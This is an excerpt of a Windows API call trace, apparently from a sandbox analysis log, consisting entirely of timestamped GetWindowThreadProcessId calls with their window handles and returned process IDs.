	[0725.364] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa68
	[0725.364] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x9f8
	[0725.364] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa04
	[0725.364] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x924
	[0725.365] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x8dc
	[0725.365] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7dc
	[0725.365] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x768
	[0725.365] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x764
	[0725.365] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x820
	[0725.365] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x810
	[0725.365] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x794
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x83c
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7ac
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb44
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x6bc
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb5c
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x838
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.366] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.367] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.367] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.367] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.367] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.367] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.367] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x818
	[0725.367] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5b8
	[0725.367] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x494
	[0725.368] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1ec
	[0725.368] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x440
	[0725.368] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7e8
	[0725.368] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x730
	[0725.368] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x2c8
	[0725.368] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x31c
	[0725.368] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x330
	[0725.368] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x128
	[0725.369] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5c8
	[0725.369] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x6f8
	[0725.369] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x358
	[0725.369] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x73c
	[0725.369] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb0
	[0725.369] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x250
	[0725.369] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x240
	[0725.370] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x790
	[0725.370] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x61c
	[0725.370] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x540
	[0725.370] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x538
	[0725.370] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x568
	[0725.370] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x538
	[0725.370] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x568
	[0725.370] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x538
	[0725.371] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x540
	[0725.371] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x540
	[0725.371] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x57c
	[0725.371] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x460
	[0725.371] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x554
	[0725.371] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0725.371] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x528
	[0725.372] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0727.097] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0727.097] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0727.097] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x79c
	[0727.097] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0727.097] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4e0
	[0727.097] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0727.097] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x460
	[0727.098] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x460
	[0727.098] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x44c
	[0727.098] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x778
	[0727.098] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x460
	[0727.098] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x558
	[0727.098] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0727.098] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4d0
	[0727.098] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1fe4
	[0727.099] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1f10
	[0727.099] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1f0c
	[0727.099] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1f08
	[0727.099] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1ef0
	[0727.099] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1eec
	[0727.099] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1ee4
	[0727.099] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1ed8
	[0727.100] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1ed0
	[0727.100] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1e8c
	[0727.100] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1e88
	[0727.100] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1e84
	[0727.100] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1604
	[0727.100] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c2c
	[0727.100] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c08
	[0727.100] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c0c
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c10
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c14
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c18
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c1c
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16fc
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1e78
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c20
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x191c
	[0727.101] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1748
	[0727.102] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1bb4
	[0727.102] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10bc
	[0727.102] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b50
	[0727.102] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x14b4
	[0727.102] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x149c
	[0727.102] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x14a8
	[0727.102] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1490
	[0727.102] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x14a4
	[0727.103] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x148c
	[0727.103] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1458
	[0727.103] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b4c
	[0727.103] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1b3c
	[0727.103] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x19bc
	[0727.103] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x199c
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1998
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1994
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1990
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1984
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x197c
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1978
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1824
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1088
	[0727.104] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1908
	[0727.105] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x18cc
	[0727.105] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x18d0
	[0727.105] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1840
	[0727.105] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10c4
	[0727.105] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x128c
	[0727.105] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16e8
	[0727.105] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16cc
	[0727.105] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x274
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10e0
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10cc
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10c0
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x10d0
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1198
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1080
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1074
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x106c
	[0727.106] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1474
	[0727.107] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1414
	[0727.107] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xbd0
	[0727.107] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x550
	[0727.107] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa38
	[0727.107] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16d0
	[0727.107] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x16d4
	[0727.107] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x15bc
	[0727.107] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x15a0
	[0727.108] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x159c
	[0727.108] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1598
	[0727.108] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1594
	[0727.108] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1590
	[0727.108] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x158c
	[0727.108] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1588
	[0727.108] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1584
	[0727.108] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1580
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x157c
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1488
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1404
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x11b8
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xbd4
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe0c
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xd30
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe70
	[0727.109] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x13b8
	[0727.110] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe20
	[0727.110] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe2c
	[0727.110] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe00
	[0727.110] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe04
	[0727.110] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc94
	[0727.110] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x13b0
	[0727.110] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x13ac
	[0727.110] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x13a8
	[0727.111] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1374
	[0727.111] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x132c
	[0727.111] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1328
	[0727.111] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x12d0
	[0727.111] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x12cc
	[0727.111] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x12c8
	[0727.111] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1290
	[0727.111] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1218
	[0727.112] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1214
	[0727.112] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x11ec
	[0727.112] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x11e8
	[0727.112] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x11cc
	[0727.112] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1140
	[0727.112] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe6c
	[0727.112] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x6e8
	[0727.112] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc6c
	[0727.113] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf94
	[0727.113] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xffc
	[0727.113] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf74
	[0727.113] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf08
	[0727.113] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf0c
